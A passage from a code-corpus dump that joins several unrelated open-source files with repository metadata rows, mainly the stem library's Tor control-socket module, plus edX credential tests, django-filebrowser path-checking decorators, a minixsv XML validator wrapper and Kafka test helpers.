self.nodes["TextField-2"]["text"] = "Very long text typed in the TextField"
def action_2(self):
self.nodes["RadioSwitch-1"]["text"] = "Very long description of the RadioSwitch"
| mit | 2,515,500,735,109,604,400 | 29.63285 | 447 | 0.671818 | false |
mmulazzani/HoneyConnector | client/stem/socket.py | 2 | 19481 | # Copyright 2011-2013, Damian Johnson
# Copyright 2012, Sean Robinson
# See LICENSE for licensing information
"""
Supports message based communication with sockets speaking the tor control
protocol. This lets users send messages as basic strings and receive responses
as instances of the :class:`~stem.response.ControlMessage` class.
**Module Overview:**
::
ControlSocket - Socket wrapper that speaks the tor control protocol.
|- ControlPort - Control connection via a port.
| |- get_address - provides the ip address of our socket
| +- get_port - provides the port of our socket
|
|- ControlSocketFile - Control connection via a local file socket.
| +- get_socket_path - provides the path of the socket we connect to
|
|- send - sends a message to the socket
|- recv - receives a ControlMessage from the socket
|- is_alive - reports if the socket is known to be closed
|- is_localhost - returns if the socket is for the local system or not
|- connect - connects a new socket
|- close - shuts down the socket
+- __enter__ / __exit__ - manages socket connection
send_message - Writes a message to a control socket.
recv_message - Reads a ControlMessage from a control socket.
send_formatting - Performs the formatting expected from sent messages.
"""
from __future__ import absolute_import
import re
import socket
import threading
import stem.prereq
import stem.response
import stem.util.str_tools
from stem.util import log
class ControlSocket(object):
"""
  Wrapper for a socket connection that speaks the Tor control protocol. For
  the most part this transparently handles the formatting for sending and
  receiving complete messages. All methods are thread safe.
Callers should not instantiate this class directly, but rather use subclasses
which are expected to implement the **_make_socket()** method.
"""
def __init__(self):
self._socket, self._socket_file = None, None
self._is_alive = False
# Tracks sending and receiving separately. This should be safe, and doing
# so prevents deadlock where we block writes because we're waiting to read
# a message that isn't coming.
self._send_lock = threading.RLock()
self._recv_lock = threading.RLock()
def send(self, message, raw = False):
"""
Formats and sends a message to the control socket. For more information see
the :func:`~stem.socket.send_message` function.
:param str message: message to be formatted and sent to the socket
:param bool raw: leaves the message formatting untouched, passing it to the socket as-is
:raises:
* :class:`stem.SocketError` if a problem arises in using the socket
* :class:`stem.SocketClosed` if the socket is known to be shut down
"""
with self._send_lock:
try:
if not self.is_alive():
raise stem.SocketClosed()
send_message(self._socket_file, message, raw)
except stem.SocketClosed, exc:
# if send_message raises a SocketClosed then we should properly shut
# everything down
if self.is_alive():
self.close()
raise exc
def recv(self):
"""
Receives a message from the control socket, blocking until we've received
one. For more information see the :func:`~stem.socket.recv_message` function.
:returns: :class:`~stem.response.ControlMessage` for the message received
:raises:
* :class:`stem.ProtocolError` the content from the socket is malformed
* :class:`stem.SocketClosed` if the socket closes before we receive a complete message
"""
with self._recv_lock:
try:
# makes a temporary reference to the _socket_file because connect()
# and close() may set or unset it
socket_file = self._socket_file
if not socket_file:
raise stem.SocketClosed()
return recv_message(socket_file)
except stem.SocketClosed, exc:
# If recv_message raises a SocketClosed then we should properly shut
# everything down. However, there's a couple cases where this will
# cause deadlock...
#
# * this socketClosed was *caused by* a close() call, which is joining
# on our thread
#
# * a send() call that's currently in flight is about to call close(),
# also attempting to join on us
#
# To resolve this we make a non-blocking call to acquire the send lock.
# If we get it then great, we can close safely. If not then one of the
# above are in progress and we leave the close to them.
if self.is_alive():
if self._send_lock.acquire(False):
self.close()
self._send_lock.release()
raise exc
def is_alive(self):
"""
Checks if the socket is known to be closed. We won't be aware if it is
    until we either use it or have explicitly shut it down.
In practice a socket derived from a port knows about its disconnection
after a failed :func:`~stem.socket.ControlSocket.recv` call. Socket file
derived connections know after either a
:func:`~stem.socket.ControlSocket.send` or
:func:`~stem.socket.ControlSocket.recv`.
This means that to have reliable detection for when we're disconnected
you need to continually pull from the socket (which is part of what the
:class:`~stem.control.BaseController` does).
:returns: **bool** that's **True** if our socket is connected and **False** otherwise
"""
return self._is_alive
def is_localhost(self):
"""
Returns if the connection is for the local system or not.
:returns: **bool** that's **True** if the connection is for the local host and **False** otherwise
"""
return False
def connect(self):
"""
Connects to a new socket, closing our previous one if we're already
attached.
:raises: :class:`stem.SocketError` if unable to make a socket
"""
with self._send_lock:
# Closes the socket if we're currently attached to one. Once we're no
# longer alive it'll be safe to acquire the recv lock because recv()
# calls no longer block (raising SocketClosed instead).
if self.is_alive():
self.close()
with self._recv_lock:
self._socket = self._make_socket()
self._socket_file = self._socket.makefile(mode = "rwb")
self._is_alive = True
# It's possible for this to have a transient failure...
# SocketError: [Errno 4] Interrupted system call
#
# It's safe to retry, so give it another try if it fails.
try:
self._connect()
except stem.SocketError:
self._connect() # single retry
def close(self):
"""
Shuts down the socket. If it's already closed then this is a no-op.
"""
with self._send_lock:
# Function is idempotent with one exception: we notify _close() if this
# is causing our is_alive() state to change.
is_change = self.is_alive()
if self._socket:
# if we haven't yet established a connection then this raises an error
# socket.error: [Errno 107] Transport endpoint is not connected
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
# Suppressing unexpected exceptions from close. For instance, if the
# socket's file has already been closed then with python 2.7 that raises
# with...
# error: [Errno 32] Broken pipe
try:
self._socket.close()
except:
pass
if self._socket_file:
try:
self._socket_file.close()
except:
pass
self._socket = None
self._socket_file = None
self._is_alive = False
if is_change:
self._close()
def _get_send_lock(self):
"""
The send lock is useful to classes that interact with us at a deep level
because it's used to lock :func:`stem.socket.ControlSocket.connect` /
:func:`stem.socket.ControlSocket.close`, and by extension our
:func:`stem.socket.ControlSocket.is_alive` state changes.
:returns: **threading.RLock** that governs sending messages to our socket
and state changes
"""
return self._send_lock
def __enter__(self):
return self
def __exit__(self, exit_type, value, traceback):
self.close()
def _connect(self):
"""
Connection callback that can be overwritten by subclasses and wrappers.
"""
pass
def _close(self):
"""
Disconnection callback that can be overwritten by subclasses and wrappers.
"""
pass
def _make_socket(self):
"""
Constructs and connects new socket. This is implemented by subclasses.
:returns: **socket.socket** for our configuration
:raises:
* :class:`stem.SocketError` if unable to make a socket
* **NotImplementedError** if not implemented by a subclass
"""
raise NotImplementedError("Unsupported Operation: this should be implemented by the ControlSocket subclass")
class ControlPort(ControlSocket):
"""
Control connection to tor. For more information see tor's ControlPort torrc
option.
"""
def __init__(self, address = "127.0.0.1", port = 9051, connect = True):
"""
ControlPort constructor.
:param str address: ip address of the controller
:param int port: port number of the controller
:param bool connect: connects to the socket if True, leaves it unconnected otherwise
:raises: :class:`stem.SocketError` if connect is **True** and we're
unable to establish a connection
"""
super(ControlPort, self).__init__()
self._control_addr = address
self._control_port = port
if connect:
self.connect()
def get_address(self):
"""
Provides the ip address our socket connects to.
:returns: str with the ip address of our socket
"""
return self._control_addr
def get_port(self):
"""
Provides the port our socket connects to.
:returns: int with the port of our socket
"""
return self._control_port
def is_localhost(self):
return self._control_addr == "127.0.0.1"
def _make_socket(self):
try:
control_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
control_socket.connect((self._control_addr, self._control_port))
return control_socket
    except socket.error as exc:
raise stem.SocketError(exc)
class ControlSocketFile(ControlSocket):
"""
Control connection to tor. For more information see tor's ControlSocket torrc
option.
"""
def __init__(self, path = "/var/run/tor/control", connect = True):
"""
ControlSocketFile constructor.
    :param str path: path where the control socket is located
:param bool connect: connects to the socket if True, leaves it unconnected otherwise
:raises: :class:`stem.SocketError` if connect is **True** and we're
unable to establish a connection
"""
super(ControlSocketFile, self).__init__()
self._socket_path = path
if connect:
self.connect()
def get_socket_path(self):
"""
Provides the path our socket connects to.
:returns: str with the path for our control socket
"""
return self._socket_path
def is_localhost(self):
return True
def _make_socket(self):
try:
control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
control_socket.connect(self._socket_path)
return control_socket
    except socket.error as exc:
raise stem.SocketError(exc)
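# Example usage of the classes above (a minimal sketch, assuming a local
# tor instance with 'ControlPort 9051' in its torrc and the send()/recv()
# helpers defined earlier on ControlSocket)...
#
#   control_socket = ControlPort(port = 9051)
#   control_socket.send('PROTOCOLINFO 1')
#   print(control_socket.recv())
#   control_socket.close()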
def send_message(control_file, message, raw = False):
"""
Sends a message to the control socket, adding the expected formatting for
  single versus multi-line messages. Neither message type should contain an
ending newline (if so it'll be treated as a multi-line message with a blank
line at the end). If the message doesn't contain a newline then it's sent
as...
::
<message>\\r\\n
and if it does contain newlines then it's split on ``\\n`` and sent as...
::
+<line 1>\\r\\n
<line 2>\\r\\n
<line 3>\\r\\n
.\\r\\n
:param file control_file: file derived from the control socket (see the
socket's makefile() method for more information)
:param str message: message to be sent on the control socket
:param bool raw: leaves the message formatting untouched, passing it to the
socket as-is
:raises:
* :class:`stem.SocketError` if a problem arises in using the socket
* :class:`stem.SocketClosed` if the socket is known to be shut down
"""
if not raw:
message = send_formatting(message)
try:
control_file.write(stem.util.str_tools._to_bytes(message))
control_file.flush()
log_message = message.replace("\r\n", "\n").rstrip()
log.trace("Sent to tor:\n" + log_message)
  except socket.error as exc:
log.info("Failed to send message: %s" % exc)
# When sending there doesn't seem to be a reliable method for
    # distinguishing between failures from a disconnect versus other things.
# Just accounting for known disconnection responses.
if str(exc) == "[Errno 32] Broken pipe":
raise stem.SocketClosed(exc)
else:
raise stem.SocketError(exc)
except AttributeError:
# if the control_file has been closed then flush will receive:
# AttributeError: 'NoneType' object has no attribute 'sendall'
log.info("Failed to send message: file has been closed")
raise stem.SocketClosed("file has been closed")
def recv_message(control_file):
"""
Pulls from a control socket until we either have a complete message or
encounter a problem.
:param file control_file: file derived from the control socket (see the
socket's makefile() method for more information)
:returns: :class:`~stem.response.ControlMessage` read from the socket
:raises:
* :class:`stem.ProtocolError` the content from the socket is malformed
* :class:`stem.SocketClosed` if the socket closes before we receive
a complete message
"""
parsed_content, raw_content = [], ""
logging_prefix = "Error while receiving a control message (%s): "
while True:
try:
line = control_file.readline()
if stem.prereq.is_python_3():
line = stem.util.str_tools._to_unicode(line)
except AttributeError:
# if the control_file has been closed then we will receive:
# AttributeError: 'NoneType' object has no attribute 'recv'
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "socket file has been closed")
raise stem.SocketClosed("socket file has been closed")
    except (socket.error, ValueError) as exc:
# When disconnected we get...
#
# Python 2:
# socket.error: [Errno 107] Transport endpoint is not connected
#
# Python 3:
# ValueError: I/O operation on closed file.
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "received exception \"%s\"" % exc)
raise stem.SocketClosed(exc)
raw_content += line
# Parses the tor control lines. These are of the form...
# <status code><divider><content>\r\n
if len(line) == 0:
# if the socket is disconnected then the readline() method will provide
# empty content
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "empty socket content")
raise stem.SocketClosed("Received empty socket content.")
elif len(line) < 4:
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "line too short, \"%s\"" % log.escape(line))
raise stem.ProtocolError("Badly formatted reply line: too short")
elif not re.match(r'^[a-zA-Z0-9]{3}[-+ ]', line):
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "malformed status code/divider, \"%s\"" % log.escape(line))
raise stem.ProtocolError("Badly formatted reply line: beginning is malformed")
elif not line.endswith("\r\n"):
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "no CRLF linebreak, \"%s\"" % log.escape(line))
raise stem.ProtocolError("All lines should end with CRLF")
line = line[:-2] # strips off the CRLF
status_code, divider, content = line[:3], line[3], line[4:]
if divider == "-":
# mid-reply line, keep pulling for more content
parsed_content.append((status_code, divider, content))
elif divider == " ":
# end of the message, return the message
parsed_content.append((status_code, divider, content))
log_message = raw_content.replace("\r\n", "\n").rstrip()
log.trace("Received from tor:\n" + log_message)
return stem.response.ControlMessage(parsed_content, raw_content)
elif divider == "+":
# data entry, all of the following lines belong to the content until we
# get a line with just a period
while True:
try:
line = control_file.readline()
if stem.prereq.is_python_3():
line = stem.util.str_tools._to_unicode(line)
        except socket.error as exc:
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "received an exception while mid-way through a data reply (exception: \"%s\", read content: \"%s\")" % (exc, log.escape(raw_content)))
raise stem.SocketClosed(exc)
raw_content += line
if not line.endswith("\r\n"):
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "CRLF linebreaks missing from a data reply, \"%s\"" % log.escape(raw_content))
raise stem.ProtocolError("All lines should end with CRLF")
elif line == ".\r\n":
break # data block termination
line = line[:-2] # strips off the CRLF
# lines starting with a period are escaped by a second period (as per
# section 2.4 of the control-spec)
if line.startswith(".."):
line = line[1:]
# appends to previous content, using a newline rather than CRLF
# separator (more conventional for multi-line string content outside
# the windows world)
content += "\n" + line
parsed_content.append((status_code, divider, content))
else:
# this should never be reached due to the prefix regex, but might as well
# be safe...
prefix = logging_prefix % "ProtocolError"
log.warn(prefix + "\"%s\" isn't a recognized divider type" % line)
raise stem.ProtocolError("Unrecognized divider type '%s': %s" % (divider, line))
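# For reference, a complete reply as recv_message() reads it off the wire
# looks something like (an illustrative example)...
#
#   250-version=0.2.4.10-alpha-dev\r\n
#   250 OK\r\n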
def send_formatting(message):
"""
Performs the formatting expected from sent control messages. For more
information see the :func:`~stem.socket.send_message` function.
:param str message: message to be formatted
:returns: **str** of the message wrapped by the formatting expected from
controllers
"""
# From control-spec section 2.2...
# Command = Keyword OptArguments CRLF / "+" Keyword OptArguments CRLF CmdData
# Keyword = 1*ALPHA
# OptArguments = [ SP *(SP / VCHAR) ]
#
# A command is either a single line containing a Keyword and arguments, or a
# multiline command whose initial keyword begins with +, and whose data
# section ends with a single "." on a line of its own.
# if we already have \r\n entries then standardize on \n to start with
message = message.replace("\r\n", "\n")
if "\n" in message:
return "+%s\r\n.\r\n" % message.replace("\n", "\r\n")
else:
return message + "\r\n"
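# For instance (an illustrative sketch of the formatting above)...
#
#   send_formatting('GETINFO version')
#   => 'GETINFO version\r\n'
#
#   send_formatting('POSTDESCRIPTOR\nline 1\nline 2')
#   => '+POSTDESCRIPTOR\r\nline 1\r\nline 2\r\n.\r\n'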
| gpl-3.0 | 899,650,971,048,636,200 | 31.041118 | 162 | 0.656537 | false |
wmarshall484/streamsx.topology | samples/python/com.ibm.streamsx.topology.pysamples/opt/python/streams/spl_sources.py | 1 | 3031 | # coding:utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015, 2016
from __future__ import absolute_import, division, print_function
import sys
# Simple inclusion of Python logic within an SPL application
# as an SPL "Function" operator. A "Function" operator has
# a single input port and single output port, a function
# is called for every input tuple, and results in
# no submission or a single tuple being submitted.
# Import the SPL decorators
from streamsx.spl import spl
# Any function in a Python module (.py file) within the
# toolkit's opt/python/streams directory is converted to a primitive operator
# with a single input and output port. The primitive operator
# is a C++ primitive that embeds the Python runtime.
#
# The function must be decorated with one of these
#
# @spl.pipe - Function is a pipe operator
# @spl.sink - Function is a sink operator
# @spl.ignore - Function is ignored
# Attributes of the input SPL tuple are passed
# as a Python Tuple and thus are available as positional arguments.
# (see examples below)
# Any returned value from a function must be a Tuple.
#
# If nothing is returned then no tuple is submitted
# by the operator for the input tuple.
#
# When a Tuple is returned, its values are assigned
# to the first N attributes of the output tuple,
# that is by position.
# The returned values in the Tuple must be assignable
# to the output tuple attribute types.
#
# If the output port has more than N attributes
# then any remaining attributes are set from the
# input tuple if there is a matching input attribute by
# name and type, otherwise the attribute remains at
# its default value.
#
# If the output port has fewer attributes than N
# then any additional values are ignored.
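# For example, a hypothetical pipe operator whose returned tuple is
# assigned by position to the first two output attributes (a sketch, not
# part of the sample namespace defined below):
#
# @spl.pipe
# def Doubler(value):
#     return value, value * 2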
# Any function whose name starts with spl is not created
# as an operator, such functions are reserved as a mechanism
# to pass information back to the primitive operator generator.
# The description of the function becomes the description
# of the primitive operator model in its operator model.
#------------------------------------------------------------------
# Example functions
#------------------------------------------------------------------
# Defines the SPL namespace for any functions in this module
# Multiple modules can map to the same namespace
def spl_namespace():
return "com.ibm.streamsx.topology.pysamples.sources"
@spl.source()
class Range(object):
def __init__(self, count):
self.count = count
def __iter__(self):
# Use zip to convert the single returned value
# into a tuple to allow it to be returned to SPL
if sys.version_info.major == 2:
            # zip() returns a list on Python 2, so wrap it in an iterator
return iter(zip(range(self.count)))
return zip(range(self.count))
@spl.source()
def Range37():
"""Sample of a function as a source operator."""
if sys.version_info.major == 2:
        # zip() returns a list on Python 2, so wrap it in an iterator
return iter(zip(range(37)))
return zip(range(37))
| apache-2.0 | -8,876,306,261,303,396,000 | 33.83908 | 77 | 0.69779 | false |
TheMOOCAgency/edx-platform | openedx/core/djangoapps/credentials/tests/test_utils.py | 14 | 7362 | """Tests covering Credentials utilities."""
import unittest
from django.conf import settings
from django.core.cache import cache
from nose.plugins.attrib import attr
import httpretty
from edx_oauth2_provider.tests.factories import ClientFactory
from provider.constants import CONFIDENTIAL
from openedx.core.djangoapps.credentials.models import CredentialsApiConfig
from openedx.core.djangoapps.credentials.tests.mixins import CredentialsApiConfigMixin, CredentialsDataMixin
from openedx.core.djangoapps.credentials.utils import (
get_user_credentials,
get_user_program_credentials,
get_programs_credentials
)
from openedx.core.djangoapps.credentials.tests import factories
from openedx.core.djangoapps.programs.tests.mixins import ProgramsApiConfigMixin, ProgramsDataMixin
from openedx.core.djangoapps.programs.models import ProgramsApiConfig
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase
from student.tests.factories import UserFactory
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
@attr(shard=2)
class TestCredentialsRetrieval(ProgramsApiConfigMixin, CredentialsApiConfigMixin, CredentialsDataMixin,
ProgramsDataMixin, CacheIsolationTestCase):
""" Tests covering the retrieval of user credentials from the Credentials
service.
"""
ENABLED_CACHES = ['default']
def setUp(self):
super(TestCredentialsRetrieval, self).setUp()
ClientFactory(name=CredentialsApiConfig.OAUTH2_CLIENT_NAME, client_type=CONFIDENTIAL)
ClientFactory(name=ProgramsApiConfig.OAUTH2_CLIENT_NAME, client_type=CONFIDENTIAL)
self.user = UserFactory()
cache.clear()
    def _expected_program_credentials_data(self):
        """
        DRY helper returning the expected program credentials response data.
        """
return [
factories.UserCredential(
id=1,
username='test',
credential=factories.ProgramCredential(),
certificate_url=self.CREDENTIALS_API_RESPONSE['results'][0]['certificate_url'],
),
factories.UserCredential(
id=2,
username='test',
credential=factories.ProgramCredential(),
certificate_url=self.CREDENTIALS_API_RESPONSE['results'][1]['certificate_url'],
)
]
def expected_credentials_display_data(self):
""" Returns expected credentials data to be represented. """
        program_credentials_data = self._expected_program_credentials_data()
return [
{
'display_name': self.PROGRAMS_API_RESPONSE['results'][0]['name'],
'subtitle': self.PROGRAMS_API_RESPONSE['results'][0]['subtitle'],
                'credential_url': program_credentials_data[0]['certificate_url']
},
{
'display_name': self.PROGRAMS_API_RESPONSE['results'][1]['name'],
                'subtitle': self.PROGRAMS_API_RESPONSE['results'][1]['subtitle'],
                'credential_url': program_credentials_data[1]['certificate_url']
}
]
@httpretty.activate
    def test_get_user_credentials(self):
        """Verify user credentials data can be retrieved."""
self.create_credentials_config()
self.mock_credentials_api(self.user)
actual = get_user_credentials(self.user)
self.assertEqual(actual, self.CREDENTIALS_API_RESPONSE['results'])
@httpretty.activate
def test_get_user_credentials_caching(self):
"""Verify that when enabled, the cache is used for non-staff users."""
self.create_credentials_config(cache_ttl=1)
self.mock_credentials_api(self.user)
# Warm up the cache.
get_user_credentials(self.user)
# Hit the cache.
get_user_credentials(self.user)
# Verify only one request was made.
self.assertEqual(len(httpretty.httpretty.latest_requests), 1)
staff_user = UserFactory(is_staff=True)
# Hit the Credentials API twice.
for _ in range(2):
get_user_credentials(staff_user)
# Verify that three requests have been made (one for student, two for staff).
self.assertEqual(len(httpretty.httpretty.latest_requests), 3)
def test_get_user_program_credentials_issuance_disable(self):
"""Verify that user program credentials cannot be retrieved if issuance is disabled."""
self.create_credentials_config(enable_learner_issuance=False)
actual = get_user_program_credentials(self.user)
self.assertEqual(actual, [])
@httpretty.activate
def test_get_user_program_credentials_no_credential(self):
"""Verify behavior if no credential exist."""
self.create_credentials_config()
self.mock_credentials_api(self.user, data={'results': []})
actual = get_user_program_credentials(self.user)
self.assertEqual(actual, [])
@httpretty.activate
def test_get_user_programs_credentials(self):
"""Verify program credentials data can be retrieved and parsed correctly."""
# create credentials and program configuration
self.create_credentials_config()
self.create_programs_config()
# Mocking the API responses from programs and credentials
self.mock_programs_api()
self.mock_credentials_api(self.user, reset_url=False)
actual = get_user_program_credentials(self.user)
        program_credentials_data = self._expected_program_credentials_data()
expected = self.PROGRAMS_API_RESPONSE['results'][:2]
expected[0]['credential_url'] = program_credentials_data[0]['certificate_url']
expected[1]['credential_url'] = program_credentials_data[1]['certificate_url']
# checking response from API is as expected
self.assertEqual(len(actual), 2)
self.assertEqual(actual, expected)
@httpretty.activate
def test_get_user_program_credentials_revoked(self):
"""Verify behavior if credential revoked."""
self.create_credentials_config()
credential_data = {"results": [
{
"id": 1,
"username": "test",
"credential": {
"credential_id": 1,
"program_id": 1
},
"status": "revoked",
"uuid": "dummy-uuid-1"
}
]}
self.mock_credentials_api(self.user, data=credential_data)
actual = get_user_program_credentials(self.user)
self.assertEqual(actual, [])
@httpretty.activate
def test_get_programs_credentials(self):
""" Verify that the program credentials data required for display can
be retrieved.
"""
# create credentials and program configuration
self.create_credentials_config()
self.create_programs_config()
# Mocking the API responses from programs and credentials
self.mock_programs_api()
self.mock_credentials_api(self.user, reset_url=False)
actual = get_programs_credentials(self.user)
expected = self.expected_credentials_display_data()
# Checking result is as expected
self.assertEqual(len(actual), 2)
self.assertEqual(actual, expected)
| agpl-3.0 | -315,961,971,362,456,300 | 39.01087 | 108 | 0.655393 | false |
vincentfung13/TwitterRepManagement | twitter_services/management/commands/populate_training_set.py | 1 | 2021 | from django.core.management.base import BaseCommand
class Command(BaseCommand):
def __init__(self):
self.duplicates = set()
self.tweets_json = {}
self.ids = set()
def handle(self, **options):
import io
import json
from TwitterRepManagement import settings
from twitter_services.models import TweetTrainingSet
if len(TweetTrainingSet.objects.all()[:1]) > 0:
print 'INFO: Training set table is already populated'
return
with io.open(settings.BASE_DIR + '/resources/twitter_services/pre.3ent.json', 'r',
encoding='utf-8') as all_tweets:
for tweet_str in all_tweets:
tweet_json = json.loads(tweet_str)
tweet_id = tweet_json.get('id_str')
if not self.__check_for_existence__(tweet_id, self.tweets_json):
self.tweets_json[tweet_id] = tweet_json
self.ids.add(tweet_id)
        # This is hard-coded to retrieve information from the pre.3ent.gold file
with io.open(settings.BASE_DIR + '/resources/twitter_services/pre.3ent.gold', 'r',
encoding='utf-8') as classification_results:
for line in classification_results:
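                # The gold file appears to be fixed-width: the tweet id sits
                # in columns 17-34 and the dimension label starts at column
                # 38 (an assumption inferred from the slicing below).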
tweet_id = line[17:35]
reputation_dimension = line[38:len(line) - 2]
if tweet_id in self.ids:
tweet = self.tweets_json.get(tweet_id)
tweet['reputation_dimension'] = reputation_dimension
self.tweets_json[tweet_id] = tweet
        # Insert into the training set table
for id_str, tweet_json in self.tweets_json.iteritems():
TweetTrainingSet.objects.create(tweet=tweet_json).save()
print 'INFO: Training set table populated.'
def __check_for_existence__(self, tweet_id, tweet_dict):
if tweet_id in tweet_dict:
self.duplicates.add(tweet_id)
return True
else:
return False
| mit | -7,170,286,164,807,566,000 | 37.865385 | 90 | 0.582385 | false |
ricktaylord/django-filebrowser | filebrowser/decorators.py | 1 | 2985 | # coding: utf-8
# PYTHON IMPORTS
import os
import logging
# DJANGO IMPORTS
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.core.exceptions import ImproperlyConfigured
from django.utils.encoding import smart_text
# FILEBROWSER IMPORTS
from filebrowser.templatetags.fb_tags import query_helper
def get_path(path, site=None):
"Get path."
logging.debug(path)
logging.debug(site.storage.location)
logging.debug(os.path.join(site.directory, path))
logging.debug(site.storage.isdir(os.path.join(site.directory, path)))
if path.startswith('.') or os.path.isabs(path) or not site.storage.isdir(os.path.join(site.directory, path)):
return None
return path
def get_file(path, filename, site=None):
"Get file (or folder)."
converted_path = smart_text(os.path.join(site.directory, path, filename))
if not site.storage.isfile(converted_path) and not site.storage.isdir(converted_path):
return None
return filename
def path_exists(site, function):
"Check if the given path exists."
def decorator(request, *args, **kwargs):
if get_path('', site=site) is None:
# The storage location does not exist, raise an error to prevent eternal redirecting.
raise ImproperlyConfigured(_("Error finding Upload-Folder (site.storage.location + site.directory). Maybe it does not exist?"))
if get_path(request.GET.get('dir', ''), site=site) is None:
msg = _('The requested Folder does not exist.')
messages.add_message(request, messages.ERROR, msg)
redirect_url = reverse("filebrowser:fb_browse", current_app=site.name) + query_helper(request.GET, u"", "dir")
return HttpResponseRedirect(redirect_url)
return function(request, *args, **kwargs)
return decorator
def file_exists(site, function):
"Check if the given file exists."
def decorator(request, *args, **kwargs):
file_path = get_file(request.GET.get('dir', ''), request.GET.get('filename', ''), site=site)
if file_path is None:
msg = _('The requested File does not exist.')
messages.add_message(request, messages.ERROR, msg)
redirect_url = reverse("filebrowser:fb_browse", current_app=site.name) + query_helper(request.GET, u"", "dir")
return HttpResponseRedirect(redirect_url)
elif file_path.startswith('/') or file_path.startswith('..'):
# prevent path traversal
msg = _('You do not have permission to access this file!')
messages.add_message(request, messages.ERROR, msg)
redirect_url = reverse("filebrowser:fb_browse", current_app=site.name) + query_helper(request.GET, u"", "dir")
return HttpResponseRedirect(redirect_url)
return function(request, *args, **kwargs)
return decorator
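# Usage sketch (hypothetical view; these decorators take the site
# explicitly rather than being applied with @-syntax):
#
#   def browse(request):
#       ...
#
#   browse = path_exists(site, file_exists(site, browse))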
| bsd-3-clause | -539,699,391,080,456,770 | 41.042254 | 139 | 0.680067 | false |
fatadama/mavlink-vscl | pymavlink/generator/lib/minixsv/minixsvWrapper.py | 4 | 2320 | #!/usr/local/bin/python
import sys
import getopt
from genxmlif import GenXmlIfError
from xsvalErrorHandler import ErrorHandler, XsvalError
from minixsv import *
from pyxsval import parseAndValidate
##########################################
# minixsv Wrapper for calling minixsv from command line
validSyntaxText = '''\
minixsv XML Schema Validator
Syntax: minixsv [-h] [-?] [-p Parser] [-s XSD-Filename] XML-Filename
Options:
-h, -?: Display this help text
-p Parser: XML Parser to be used
(XMLIF_MINIDOM, XMLIF_ELEMENTTREE, XMLIF_4DOM
default: XMLIF_ELEMENTTREE)
-s XSD-FileName: specify the schema file for validation
(if not specified in XML-File)
'''
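# Example invocation (a sketch; assumes test.xml references test.xsd):
#
#   minixsv -p XMLIF_ELEMENTTREE -s test.xsd test.xml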
def checkShellInputParameter():
"""check shell input parameters."""
xmlInputFilename = None
xsdFilename = None
xmlParser = "XMLIF_ELEMENTTREE"
try:
(options, arguments) = getopt.getopt(sys.argv[1:], '?hp:s:')
if ('-?','') in options or ('-h','') in options:
print validSyntaxText
sys.exit(-1)
else:
if len (arguments) == 1:
xmlInputFilename = arguments[0]
for o, a in options:
if o == "-s":
xsdFilename = a
if o == "-p":
if a in (XMLIF_MINIDOM, XMLIF_ELEMENTTREE, XMLIF_4DOM):
xmlParser = a
else:
print 'Invalid XML parser %s!' %(a)
sys.exit(-1)
else:
print 'minixsv needs one argument (XML input file)!'
sys.exit(-1)
    except getopt.GetoptError as errstr:
print errstr
sys.exit(-1)
return xmlInputFilename, xsdFilename, xmlParser
def main():
xmlInputFilename, xsdFileName, xmlParser = checkShellInputParameter()
try:
parseAndValidate (xmlInputFilename, xsdFile=xsdFileName, xmlIfClass=xmlParser)
    except IOError as errstr:
print errstr
sys.exit(-1)
    except GenXmlIfError as errstr:
print errstr
sys.exit(-1)
    except XsvalError as errstr:
print errstr
sys.exit(-1)
if __name__ == "__main__":
main()
| lgpl-3.0 | -4,915,371,194,551,806,000 | 29.526316 | 86 | 0.54569 | false |
gf53520/kafka | tests/unit/directory_layout/check_project_paths.py | 28 | 3699 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kafkatest.directory_layout.kafka_path import create_path_resolver, KafkaSystemTestPathResolver, \
KAFKA_PATH_RESOLVER_KEY
from kafkatest.version import V_0_9_0_1, DEV_BRANCH, KafkaVersion
class DummyContext(object):
def __init__(self):
self.globals = {}
class DummyPathResolver(object):
"""Dummy class to help check path resolver creation."""
def __init__(self, context, project_name):
pass
class DummyNode(object):
"""Fake node object"""
pass
class CheckCreatePathResolver(object):
def check_create_path_resolver_override(self):
"""Test override behavior when instantiating a path resolver using our factory function.
If context.globals has an entry for a path resolver class, use that class instead of the default.
"""
mock_context = DummyContext()
mock_context.globals[KAFKA_PATH_RESOLVER_KEY] = \
"unit.directory_layout.check_project_paths.DummyPathResolver"
resolver = create_path_resolver(mock_context)
assert type(resolver) == DummyPathResolver
def check_create_path_resolver_default(self):
"""Test default behavior when instantiating a path resolver using our factory function.
"""
resolver = create_path_resolver(DummyContext())
assert type(resolver) == KafkaSystemTestPathResolver
def check_paths(self):
"""Check expected path resolution without any version specified."""
resolver = create_path_resolver(DummyContext())
assert resolver.home() == "/opt/kafka-dev"
assert resolver.bin() == "/opt/kafka-dev/bin"
assert resolver.script("kafka-run-class.sh") == "/opt/kafka-dev/bin/kafka-run-class.sh"
def check_versioned_source_paths(self):
"""Check expected paths when using versions."""
resolver = create_path_resolver(DummyContext())
assert resolver.home(V_0_9_0_1) == "/opt/kafka-0.9.0.1"
assert resolver.bin(V_0_9_0_1) == "/opt/kafka-0.9.0.1/bin"
